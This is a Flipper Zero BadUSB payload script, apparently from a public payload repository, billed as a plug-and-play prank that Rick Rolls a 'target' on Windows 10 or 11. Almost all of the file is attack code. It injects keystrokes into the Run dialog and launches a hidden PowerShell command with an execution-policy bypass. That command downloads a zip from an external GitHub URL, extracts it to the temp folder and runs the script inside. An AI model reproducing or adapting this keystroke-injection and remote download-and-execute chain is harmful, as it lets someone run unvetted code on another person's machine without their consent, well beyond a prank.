Flipper-Zero-BadUSB/Payloads/Flip-ADV-RickRoll/ADV-RickRoll.txt
2022-12-16 17:45:51 -06:00

18 lines
859 B
Text

* Title: ADV-RickRoll
* Author: I am Jakoby
* Description: This is a one liner payload that will Rick Roll your target. Video will be played a full screen and max volume.
* Upon deployment payload will pause until a mouse movement is detected and run once one is.
* Target: Windows 10, 11
* --------------------------------------------------------------------------------------
* THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
* --------------------------------------------------------------------------------------
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/rr.zip' -O "$D\rr.zip";Expand-Archive "$D\rr.zip" -Des $D\rr -Force;. "$D\rr\rr.ps1"
ENTER